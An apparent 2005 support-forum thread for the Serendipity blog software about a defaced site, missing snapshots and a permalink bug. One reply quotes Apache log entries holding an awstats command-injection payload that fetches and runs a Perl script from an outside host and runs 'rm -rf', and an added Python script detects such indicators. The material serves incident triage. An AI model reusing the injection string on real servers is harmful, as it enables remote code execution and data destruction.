XTech Inc
I guess I've been owned! My website was doing fine and I got home tonight to find it only now says:
XTech Inc
And I guess I'm not the only one. Anybody else have the same problem and know what to do about it before I spend too much time trying to figure it out? My domain name is www.thecockrells.com.
Well it seems replacing the index.php got my site back up and running but I hope that's all it messed up. Anybody else have this problem? Anybody know why or how this could have happened? I did a search for XTech Inc and found that they have defaced a bunch of websites recently. I was running a nightly snapshot dated 20050613 if that helps anyone.
Hi,
davecjr wrote:
> I may be missing something but where is the correct place to get the latest snapshot of 9 beta? (download as one zip or tar)
> thx in advance...
Version 0.9 isn't to beta yet...it's currently at alpha-3. That said, it's what I use as my main blog, so it's pretty stable.
Snapshots for developmental versions are usually at http://s9y.org/12.html, but I assume because of the hardware problems with the server, the snapshots aren't working right.
You can grab the sources from SVN if you really want, but I'd just recommend upgrading to 0.8.2 from the tarball on the s9y downloads page...
This is just my being curious, but have you checked your webserver logs to see how it was compromised? The easiest way, if you have apache, is to grep -R 'wget' /var/log/apache*, as most of the script kiddies try to use wget...
I may not have mentioned it but I am on 9 alpha 3 and I was using the snapshot dated 0613 but didn't know where I could download the entire zip since they weren't listed on http://s9y.org/12.html anymore.
I did look through the logs but I don't guess I know what I'm looking for.
Sorry...missed that you were running a snapshot...
You could use SVN to directly download s9y from berlios. Look at http://developer.berlios.de/svn/?group_id=2573 for information.
About the logs, what you're looking for is anything that's "funny." Something that is very, very funny is that there are wget commands in an apache error or access log. A server I admin was recently hacked because a user installed an old, insecure version of a stats program. This is what the hacking attempted looked like in my logs:
This is all very funny for apache to be doing...
access.log:
66.159.247.81 - - [27/Jun/2005:18:57:00 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesss;perl%20sesss;echo%20;echo'rm -rf *| HTTP/1.1" 400 373 "-" "-"
error.log:
[Mon Jun 27 18:57:00 2005] [error] [client 66.159.247.81] request failed: erroneous characters after protocol string: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesss;perl%20sesss;echo%20;echo'rm -rf *| HTTP/1.1
[Mon Jun 27 19:01:57 2005] [error] mod_gzip: TRANSMIT_ERROR:0
--19:59:40-- http://lamer.biz/sesssiune
=> `sesssiune'
Resolving lamer.biz... 82.165.128.204
Connecting to lamer.biz[82.165.128.204]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,811 [text/plain]
0K .......... .......... 100% 293.60 KB/s
19:59:40 (293.60 KB/s) - `sesssiune' saved [20811/20811]
sh: line 1: /awstats.main.conf: No such file or directory
[Mon Jun 27 19:59:44 2005] [error] [client 66.159.247.81] request failed: erroneous characters after protocol string: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesssiune;perl%20sesssiune;echo%20;echo'rm -rf *| HTTP/1.1
[Mon Jun 27 20:04:41 2005] [error] mod_gzip: TRANSMIT_ERROR:0
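A small log triage script, added here as an example (not code from this thread or from s9y), that does what the grep-for-wget advice and the "look for anything funny" advice above describe: it pulls the request out of Apache access.log and error.log lines, percent-decodes it, and flags the command-injection indicators visible in the quoted entries. The sample lines are constructed from the entries quoted in this post (the benign one uses a documentation IP), and the indicator list and function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the access.log and error.log entries
# quoted in this post; the benign second line uses a documentation IP.
SAMPLE_LOG = """\
66.159.247.81 - - [27/Jun/2005:18:57:00 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesss;perl%20sesss;echo%20;echo'rm -rf *| HTTP/1.1" 400 373 "-" "-"
192.0.2.10 - - [27/Jun/2005:19:00:12 -0400] "GET /blog/index.php?/archives/12-hello.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
[Mon Jun 27 19:59:44 2005] [error] [client 66.159.247.81] request failed: erroneous characters after protocol string: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20lamer.biz/sesssiune;perl%20sesssiune HTTP/1.1
[Mon Jun 27 20:04:41 2005] [error] mod_gzip: TRANSMIT_ERROR:0
"""

# Signs of a shell command being smuggled through a query string (hypothetical
# list; extend it for your own environment).
INDICATORS = [
    (r"\b(wget|curl|fetch|lynx)\b", "download tool in request"),
    (r"[;|`]|\$\(", "shell metacharacter in request"),
    (r"(^|[\s;|])(cd|perl|sh|bash|python)\s", "shell/interpreter command in request"),
    (r"/tmp\b", "reference to /tmp"),
    (r"\brm\s+-rf\b", "destructive command in request"),
]

# Request line inside an access entry ("GET /path HTTP/1.1") or after the
# "protocol string: " prefix that Apache writes into error.log.
REQUEST_RE = re.compile(r'(?:"|: )(GET|POST|HEAD)\s+(\S+)')
CLIENT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s|\[client ([^\]]+)\]")

def extract_request(line):
    """Return (client, percent-decoded request path) or None if no request is present."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    c = CLIENT_RE.search(line)
    client = (c.group(1) or c.group(2)) if c else "unknown"
    # Decode %20 and friends so encoding cannot hide the payload from the patterns.
    return client, unquote(m.group(2))

def scan_log(text):
    """Return [(client, decoded path, [reasons])] for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        req = extract_request(line)
        if req is None:
            continue
        client, path = req
        reasons = [why for pattern, why in INDICATORS if re.search(pattern, path)]
        if reasons:
            hits.append((client, path, reasons))
    return hits
```

Run scan_log over the contents of your own access.log and error.log; every hit names the client and the decoded request, which is what you then trace forward in the logs to see what the request did.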
I didn't notice anything that I thought was too funny but will dig more. I had something else happen today that I hope isn't related but I haven't done anything else but post an article since I fixed the XTech problem.
Could this be related to permalink problems? I added the permalink plugin a while ago but never really used it. I added an article to my blog this morning and now all my links to articles just point to:
http://www.thecockrells.com/blog/permalink/UNKNOWN.html
If it isn't possible for something like this to be related to the xml-rpc issue, any ideas?!
Again thanks in advance...
garvinhicking (Core Developer):
Indeed, it slipped my mind when I patched the plugin to adjust the right permalink to use if a permalink is non-unique.
Will change this this weekend
Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
I thought it had to be installed for some other plugins like the contact form but outside of that, I haven't used it but had considered using it. I just wonder why it started acting funny today. Like I said, I've had it installed for a little while now and never changed anything associated with it and this just started acting like this today.
I'll just uninstall anyway. Earlier I asked about a place to download a snapshot as a single download like you once could. I appreciate someone pointing me to the Berlios site but I had already looked there and couldn't find a way to download the entire package instead of single files. Am I missing something or is that just not available anymore?
Thanks
garvinhicking (Core Developer):
The snapshots are currently not available, that is right. They will be put online again once our server is running at full speed again.
Regards,
Garvin